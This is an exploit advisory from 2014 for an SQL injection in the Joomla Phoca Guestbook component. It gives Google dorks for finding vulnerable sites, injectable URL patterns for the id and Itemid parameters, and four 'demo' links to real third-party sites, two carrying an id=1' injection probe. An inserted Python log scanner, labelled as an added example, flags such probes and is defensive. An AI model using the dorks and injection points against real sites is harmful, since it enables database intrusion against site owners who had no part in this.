
Phoca Guestbook SQL injection vulnerability

Author: Cyber Guard TeaM, Published: 14-06-2014
##############################################################

# Exploit Title : Powered by Phoca Guestbook SQL injection vulnerability
#
# Exploit Author : Cyber Guard TeaM
#
# Discovered By : Injector
#
# Home : Cyber-guard.org
#
# Dork 1: Powered by Phoca Guestbook inurl:"id=" & intext:"Warning: mysql_query()
#
# Dork 2: Powered by Phoca Guestbook inurl:"index.php?option=com_phocaguestbook" & intext:"Warning: mysql_query()
#
# Date: 14/6/2014
#
# Tested on: Kali, Win7
#
# Vendor's Website: http://www.phoca.cz/
#
##############################################################

VULNERABILITY

##############


[~] http://www.site.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=[SQL INJECTION]

[~] http://www.site.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=[SQL INJECTION]

##############
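
For sites running the component, a triage check for the two parameters listed above, as an added example (not code from the advisory or from Phoca): it flags access-log requests to com_phocaguestbook whose id or Itemid is not a plain integer. The combined log format, the Joomla "12:alias" slug form allowed for id, and the names suspicious_params and scan are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Expected shapes for the two parameters the advisory marks as injectable.
# Assumption: "id" may use Joomla's "12:alias" slug form, "Itemid" is a bare integer.
EXPECTED = {
    "id": re.compile(r"\d{1,10}(:[\w-]+)?"),
    "Itemid": re.compile(r"\d{1,10}"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format (not taken from any real site).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jun/2014:10:00:01 +0000] "GET /index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=4 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [14/Jun/2014:10:00:05 +0000] "GET /index.php?option=com_phocaguestbook&view=phocaguestbook&id=1%27 HTTP/1.1" 500 310',
    '203.0.113.9 - - [14/Jun/2014:10:00:06 +0000] "GET /index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=4%27 HTTP/1.1" 500 310',
    '198.51.100.2 - - [14/Jun/2014:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=7:news HTTP/1.1" 200 900',
    '198.51.100.3 - - [14/Jun/2014:10:02:00 +0000] "GET /index.php?option=com_phocaguestbook&view=phocaguestbook&id=1:guestbook&Itemid=13 HTTP/1.1" 200 5000',
]


def suspicious_params(url):
    """Return {param: decoded value} for id/Itemid values that break the expected
    shape on requests routed to com_phocaguestbook; {} otherwise."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_phocaguestbook" not in query.get("option", []):
        return {}
    return {
        name: value
        for name, pattern in EXPECTED.items()
        for value in query.get(name, [])
        if not pattern.fullmatch(value)
    }


def scan(log_lines):
    """Return [(line_number, findings)] for access-log lines worth triaging."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        findings = suspicious_params(match.group(1)) if match else {}
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {findings}")
```

Values are compared after URL decoding, so an encoded quote (%27) is caught the same way as a literal one. The same integer-only rule can be enforced at a reverse proxy or WAF in front of index.php until the component is updated.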

demo 1: http://www.wgm-wanderverein.de/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=4

demo 2: http://hallenturniere.tvsteinheim-fussball.de/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=13

demo 3: http://www.delle-rose.eu/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1'

demo 4: http://www.istudyabroadmorocco.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1'


##############################################################

Special thanks to: ICA, StorM and all members

##############################################################
